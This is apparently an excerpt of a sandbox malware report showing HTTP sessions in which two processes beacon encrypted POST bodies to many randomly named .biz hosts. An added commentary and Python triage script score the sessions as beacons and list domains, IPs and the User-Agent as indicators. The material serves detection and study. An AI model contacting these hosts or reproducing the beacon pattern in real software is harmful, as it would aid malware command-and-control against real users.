Set-Cookie: btst=2c4dc3978bf3f37e10111479881a7871|8.46.123.75|1732605322|1732605322|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.10 | 50061 | 18.141.10.107 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:22.828190088 CET | 347 | OUT | POST /rmu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:22.828241110 CET | 834 | OUT | Data Raw: c2 78 36 4a 57 c5 6b 99 36 03 00 00 2d 78 74 77 ce 12 7d f2 f1 f0 be d4 49 e7 89 6f b2 a6 bf c2 43 3c c3 24 5d 78 8b 48 e6 39 70 a6 b4 11 a9 ed 91 fe 70 ca 55 b9 e7 d6 e0 3f 9b a1 c9 8b 27 eb 0a 0e ee ad 1f 16 6a 48 b4 66 11 97 01 5c 15 96 00 ff
Data Ascii: x6JWk6-xtw}IoC<$]xH9ppU?'jHf\"8P?"B,xA+[:8iX'QTZ#v@~vY#q_14Z&|+m/g.$zmvQN>K;:C!bar$#|~"i_>(Cwm"r005
Nov 26, 2024 08:15:24.947565079 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7b7769fc83cd01dcf9b0e4f4df3a3812|8.46.123.75|1732605324|1732605324|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.10 | 50062 | 213.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:23.585863113 CET | 353 | OUT | POST /ajqmmfcm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:23.586184025 CET | 778 | OUT | Data Raw: b7 0a 98 8e 3c 2d 5b ff fe 02 00 00 a0 a5 01 b7 9a 33 b5 3c 3f 5e 6c 38 4c b4 41 94 c8 6a 91 40 63 5b 19 5c ea 58 6c 42 82 5a 6f a9 3e 64 52 2d d3 e9 0f ef 80 09 11 e2 ba 08 9f 0a c4 89 2a b6 d1 d1 3f 61 76 b7 90 5d c4 dd a9 10 46 6b ff fc d0 9a
Data Ascii: <-[3<?^l8LAj@c[\XlBZo>dR-*?av]Fk'")O@/AM6AGv1M;(enjevjRXX\"y,ohPSex{bKE< $[gCn?g"#a[Bt%6Idx.<+cBDL
Nov 26, 2024 08:15:25.689496040 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c817d9dbc0ffdc4933e692e61006c457|8.46.123.75|1732605325|1732605325|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.10 | 50065 | 18.246.231.120 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:25.357831001 CET | 354 | OUT | POST /txgdoagkkmvqc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:25.357831001 CET | 834 | OUT | Data Raw: 3b 99 cb c5 dd 71 4d 62 36 03 00 00 4f 6c 2b fc 59 a2 77 47 56 5d 41 86 66 43 59 95 9a 54 00 26 09 b1 ff ac e8 c7 95 5c a2 d5 04 fa 06 45 19 e2 68 1d 17 a1 aa ab d3 26 3b 99 de 91 65 a3 d9 bc 88 1e ee 94 13 c8 89 f9 fe 7c 7f 84 77 2a c7 1f 2b fd
Data Ascii: ;qMb6Ol+YwGV]AfCYT&\Eh&;e|w*+P">x~@(7x4^dOa487H-<d"B:s/c].NqKIo*U>v\GQWW%/AfS+<7qRsn_u[
Nov 26, 2024 08:15:26.771281958 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c14ae9a3bb6ed279c2c3b78cd6948879|8.46.123.75|1732605326|1732605326|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.10 | 50066 | 34.211.97.45 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:26.132034063 CET | 354 | OUT | POST /wmyvrothcg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:26.132070065 CET | 778 | OUT | Data Raw: 7d b4 b9 9a 56 76 c8 af fe 02 00 00 9f 1d a3 ca 3f a6 d3 99 c7 7b be bb ae b4 7a 62 09 3d c3 85 7f cd e0 a6 af b2 c7 60 3c e7 fb bf 5d 83 5c f4 2d 21 21 11 78 18 04 41 90 3c e7 89 49 aa d7 e5 00 c0 5a 5c 3b df f8 8d 07 1f e8 b4 38 7c 03 69 c2 23
Data Ascii: }Vv?{zb=`<]\-!!xA<IZ\;8|i#aA9!4F23&.8M1GeH~iId[K\f-5&DV73!"skV[{{e}{!pw C "c/NL9
Nov 26, 2024 08:15:27.584552050 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ecf3e952dde18ca22d545aa05e7af735|8.46.123.75|1732605327|1732605327|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


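The sessions above all have one shape: a POST with a single random lowercase path label to a .biz host that is never contacted twice, the same WeChat/QQBrowser User-Agent, only six request headers (no Accept, Content-Type or Referer, so not browser-shaped), an opaque body of a fixed size per process (778 bytes from alg.exe, 834 bytes from Native_neworigin.exe), and a 200 OK from nginx whose chunked body is just the terminator. The script below is an added triage example, not part of the Joe Sandbox report or its tooling: it re-types sessions 81 to 84 as data (values copied from the report; session 84's response body is not in this excerpt and is recorded as not captured) and scores them with those checks. One interpretation in it is an assumption drawn from this excerpt rather than a documented protocol: bytes 8 to 11 of each body, read as a little-endian integer, equal Content-Length minus 12 in all four captured bodies (0x2fe = 766 = 778 - 12, 0x336 = 822 = 834 - 12), which the script treats as a length field behind a 12-byte header.

```python
"""Beacon triage over the HTTP sessions of a sandbox report (added example).

Input is constructed from sessions 81-84 of this report, reduced to the fields
the checks need. Every value is copied from the report text except
resp_body=None for session 84, whose response body is not in this excerpt.
"""
import re
from collections import defaultdict

# User-Agent string exactly as it appears in all four requests.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
# The only request headers present; a browser POST would also carry Accept, Content-Type, etc.
REQ_HDRS = ("Cache-Control", "Connection", "Pragma", "Host", "User-Agent", "Content-Length")
ALG = r"C:\Windows\System32\alg.exe"
NNO = r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"

# t = seconds after 08:15:00 CET; body = first 12 bytes of each "Data Raw" line.
SESSIONS = [
    dict(sid=81, t=23.586, pid=6072, proc=ALG, dst="213.251.16.150", host="sxmiywsfv.biz",
         path="/ajqmmfcm", clen=778, hdrs=REQ_HDRS, ua=UA,
         body=bytes.fromhex("b70a988e3c2d5bfffe020000"), status=200, resp_body=b"0\r\n\r\n"),
    dict(sid=82, t=25.358, pid=7892, proc=NNO, dst="18.246.231.120", host="vyome.biz",
         path="/txgdoagkkmvqc", clen=834, hdrs=REQ_HDRS, ua=UA,
         body=bytes.fromhex("3b99cbc5dd714d6236030000"), status=200, resp_body=b"0\r\n\r\n"),
    dict(sid=83, t=26.132, pid=6072, proc=ALG, dst="34.211.97.45", host="vrrazpdh.biz",
         path="/wmyvrothcg", clen=778, hdrs=REQ_HDRS, ua=UA,
         body=bytes.fromhex("7db4b99a5676c8affe020000"), status=200, resp_body=b"0\r\n\r\n"),
    dict(sid=84, t=27.040, pid=7892, proc=NNO, dst="18.208.156.248", host="yauexmxk.biz",
         path="/dqpygue", clen=834, hdrs=REQ_HDRS, ua=UA,
         body=bytes.fromhex("5636c3c046f12cf436030000"), status=200, resp_body=None),
]

RANDOM_PATH = re.compile(r"^/[a-z]{6,16}$")
BROWSER_HDRS = {"Accept", "Accept-Language", "Accept-Encoding", "Content-Type", "Origin", "Referer"}


def body_length_field(s):
    """Assumption (not a documented protocol): bytes 8..11 of the body are a
    little-endian length of the payload following a 12-byte header."""
    return int.from_bytes(s["body"][8:12], "little")


def session_flags(s):
    """Per-request indicators; each string names one check that fired."""
    flags = []
    if RANDOM_PATH.match(s["path"]):
        flags.append("random-path")            # one random lowercase label, no extension
    if not BROWSER_HDRS & set(s["hdrs"]):
        flags.append("no-browser-headers")     # request is not browser-shaped
    if body_length_field(s) == s["clen"] - 12:
        flags.append("len-field@8")            # binary framing consistent across beacons
    if s["resp_body"] is None:
        flags.append("resp-not-captured")      # do not score what was not observed
    elif s["status"] == 200 and s["resp_body"] == b"0\r\n\r\n":
        flags.append("empty-chunked-200")      # server acks with an empty chunked body
    return flags


def beacon_groups(sessions, window_s=60.0):
    """Group requests by (PID, User-Agent). A process that POSTs the same request
    shape to several distinct hosts on distinct IPs inside the window is a beacon
    candidate, whatever any single hostname looks like (vyome.biz alone would not
    trip a per-label randomness test)."""
    groups = defaultdict(list)
    for s in sessions:
        groups[(s["pid"], s["ua"])].append(s)
    out = {}
    for (pid, _ua), ss in groups.items():
        ss.sort(key=lambda s: s["t"])
        hosts = {s["host"] for s in ss}
        ips = {s["dst"] for s in ss}
        span = ss[-1]["t"] - ss[0]["t"]
        shared = set.intersection(*(set(session_flags(s)) for s in ss))
        if len(hosts) >= 2 and len(ips) == len(hosts) and span <= window_s and "random-path" in shared:
            out[pid] = dict(proc=ss[0]["proc"], hosts=sorted(hosts), ips=sorted(ips),
                            span_s=round(span, 3), body_sizes=sorted({s["clen"] for s in ss}),
                            shared_flags=sorted(shared))
    return out


def iocs(sessions):
    """Flat indicator lists for blocking and hunting, straight from the sessions."""
    return dict(domains=sorted({s["host"] for s in sessions}),
                ips=sorted({s["dst"] for s in sessions}),
                user_agents=sorted({s["ua"] for s in sessions}),
                body_sizes=sorted({s["clen"] for s in sessions}))


if __name__ == "__main__":
    for pid, g in beacon_groups(SESSIONS).items():
        print(f"PID {pid} {g['proc']}: {len(g['hosts'])} hosts in {g['span_s']}s, "
              f"body sizes {g['body_sizes']}, shared flags {g['shared_flags']}")
    print(iocs(SESSIONS))
```

Two caveats before acting on the output. First, the grouping is keyed on PID and User-Agent because the fan-out (fresh host, fresh IP, identical request shape, seconds apart) is the robust signal; the per-request flags are evidence, not a verdict on their own, and the fixed body sizes are specific to this run. Second, the responders in sessions 80 to 83 are all nginx and hand back the same btst/snkz cookie layout, the same sandbox source IP and the same 2027 expiry for unrelated domains; that is consistent with one backend behind all of them (a sinkhole is one possibility) and the report does not say which, so treat the domains as indicators of the sample's behaviour rather than as confirmed live C2.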
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.10 | 50067 | 18.208.156.248 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:27.039500952 CET | 351 | OUT | POST /dqpygue HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:27.039592981 CET | 834 | OUT | Data Raw: 56 36 c3 c0 46 f1 2c f4 36 03 00 00 3f c8 4b 27 ff 4b 57 4d a5 16 82 96 0c d7 1e b3 2d db cb 94 27 88 36 76 8a 16 3f e4 a1 f5 e8 d2 5b 7a 92 d7 00 62 6f 88 69 e0 a6 ce 0a 1b 53 03 4c 39 d0 50 c4 30 69 5a b1 09 cd a7 38 62 41 3a 0c fb 9b 35 85 75
Data Ascii: V6F,6?K'KWM-'6v?[zboiSL9P0iZ8bA:5uQ!bDwH/S}>{H`Zr~*F{ 4_fvf~nN4'H16?ZN2'O2*1!.Q}-jX8,g2!;
Nov 26, 2024 08:15:28.243186951 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a6d45d8b90873077c979786a2a748de5|8.46.123.75|1732605328|1732605328|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID: 85 | Source IP: 192.168.2.10 | Source Port: 50068 | Destination IP: 47.129.31.212 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:28.285382032 CET | 352 bytes | OUT | POST /ubrpiugbci HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:28.285406113 CET | 778 bytes | OUT | Data Raw: 49 d8 e8 b1 d5 9f 95 e5 fe 02 00 00 22 f1 d4 6d 09 14 dd a8 b3 cd e6 02 41 b5 29 51 9b 7f 40 80 d5 76 75 03 cb 28 60 86 01 69 e4 85 4e b4 b8 90 07 9d 96 1a a7 f4 47 98 14 fe 51 5f b7 99 27 20 2c 5a 25 45 5b 78 f1 25 f1 3f 31 48 dd 12 ed d7 10 01
Data Ascii: I"mA)Q@vu(`iNGQ_' ,Z%E[x%?1HaLLJFq:boTG\?DScdw%gp.EeU-#Sir!Pifb4RtiVE]C-5}@P
Nov 26, 2024 08:15:30.391016006 CET | 408 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=53cc70f77eefd70c7cfb6a5d8c11153c|8.46.123.75|1732605329|1732605329|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 86 | Source IP: 192.168.2.10 | Source Port: 50069 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:28.518765926 CET | 355 bytes | OUT | POST /qjkfpfdycqfln HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:28.518812895 CET | 834 bytes | OUT | Data Raw: 2c 6f 84 5b 84 2a 45 80 36 03 00 00 18 6a 81 2f f3 54 44 6d 6d 30 85 da 2c 8d 55 f0 a6 c9 7e 55 fc aa a7 a8 7e 28 1f 5a df 3b 15 cd 5c 28 27 fe 6d 2f ee 23 80 84 43 5b a0 1c 4e d0 7b f9 66 e9 56 e5 b2 33 1f 7d 0c f0 2f 99 0d b6 aa 4f 07 71 34 86
Data Ascii: ,o[*E6j/TDmm0,U~U~(Z;\('m/#C[N{fV3}/Oq4[67FXIg3eqk0t0p*NKgnev>_S39!S{??UMYbU:!~RAX07j&%z`w-tp#pNgCK6Hc
Nov 26, 2024 08:15:30.673027992 CET | 408 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=048dcf7d202d129ff868d168b4dba761|8.46.123.75|1732605330|1732605330|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 87 | Source IP: 192.168.2.10 | Source Port: 50070 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:30.822477102 CET | 358 bytes | OUT | POST /vauoordpmpgaykv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:30.822477102 CET | 778 bytes | OUT | Data Raw: de b7 4f c7 91 d3 a4 1b fe 02 00 00 01 e7 65 eb fb 4f d0 98 22 e8 1d 4f fb e8 5c 95 6c 22 cf 48 1e f5 7a f5 4a 51 c4 36 e6 b5 7c 9c 44 2a 03 22 eb c6 ea 8c 2f c6 cd e4 36 08 2f b4 f6 11 64 35 2e d2 d1 62 9a 79 c7 91 dc 7c 78 1a f0 da c7 e9 65 b9
Data Ascii: OeO"O\l"HzJQ6|D*"/6/d5.by|xe!sGq*h^iJ?M||*m@\{pSWu%VB=i^wTM4+6->K0y?{lcu%zgot y;M<;=epL'
Nov 26, 2024 08:15:32.926733017 CET | 409 bytes | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fd12138a80fa3b56fc27f0f9ab01a44e|8.46.123.75|1732605332|1732605332|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.10 | 50071 | 13.251.16.150 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:30.948832989 CET | 348 | OUT | POST /vtk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:30.948910952 CET | 834 | OUT | Data Raw: 77 52 2f 7a 64 f2 53 3e 36 03 00 00 60 e3 74 2d 44 0a 06 28 e4 b1 03 3b 93 be f7 d3 ba 26 d6 b4 58 9c 92 59 0c 70 35 f7 2c 74 d2 f1 f6 d8 ee 2f ee 78 70 ba 37 05 c2 e1 6d dd ac 2c 8c 61 cd 66 a4 90 69 41 21 f1 74 35 30 06 17 96 a7 ff 8c 4c 5c c3
Nov 26, 2024 08:15:33.097506046 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8856a80de75b5b2a7067edb1ad09843b|8.46.123.75|1732605332|1732605332|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.10 | 50072 | 34.211.97.45 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:33.373687029 CET | 356 | OUT | POST /jsmhknoucgib HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:33.373714924 CET | 834 | OUT | Data Raw: 3b 68 a6 50 14 b3 7f d1 36 03 00 00 4c 5b 6b 2c d4 64 d2 02 9a 30 23 82 3e 14 33 4a de 92 a6 30 3c ba 1f 07 95 4f b1 39 8d 76 ac c1 aa 7f c0 23 fe 83 a3 94 5f 86 0a 12 b6 13 fa 00 73 b0 32 93 ee 0a ba e6 34 35 92 0b 7d 41 f3 1e f2 54 5e 2e 11 9d
Nov 26, 2024 08:15:34.734556913 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e9acaa48f6888ed69424f6aa635b0726|8.46.123.75|1732605334|1732605334|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.10 | 50073 | 34.211.97.45 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:33.645860910 CET | 350 | OUT | POST /udyyttdfi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:33.645891905 CET | 778 | OUT | Data Raw: 08 a6 6f 1c 28 3a 19 2c fe 02 00 00 a4 9e 16 6c 65 a7 d6 03 e6 85 9e ef ef f6 93 08 a8 6e a4 5e 03 88 64 b7 35 54 49 c0 c2 ec 8e 73 45 11 e7 40 a4 58 7c be d7 f0 cb 5f 93 06 e4 30 fd 63 01 bd 32 76 d5 86 0b 65 95 ff 37 8e ce e6 ca e4 91 a5 da c4
Nov 26, 2024 08:15:34.974289894 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=35ba5822ddb0230a71e9639c312c313e|8.46.123.75|1732605334|1732605334|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.10 | 50074 | 47.129.31.212 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:35.005057096 CET | 348 | OUT | POST /rvwkmk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:35.005088091 CET | 834 | OUT | Data Raw: e5 04 c2 eb 38 25 52 a0 36 03 00 00 32 3f b5 64 1d b9 3a 96 61 2d 19 fa 11 9e 20 4c 09 df e1 b5 82 43 cc 4a 1a 20 4c 4f 51 0d f7 87 67 cf b0 94 42 98 84 1f 09 52 d8 93 a6 0e 64 7f 12 7c 42 4f 3c 87 82 a5 17 ae 10 51 76 a1 28 fe df a6 fc 47 0f 2f
Nov 26, 2024 08:15:37.108252048 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cdeeadc42c7931aa5f57de2d73d3167c|8.46.123.75|1732605336|1732605336|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.10 | 50075 | 3.94.10.34 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:35.765094042 CET | 346 | OUT | POST /y HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
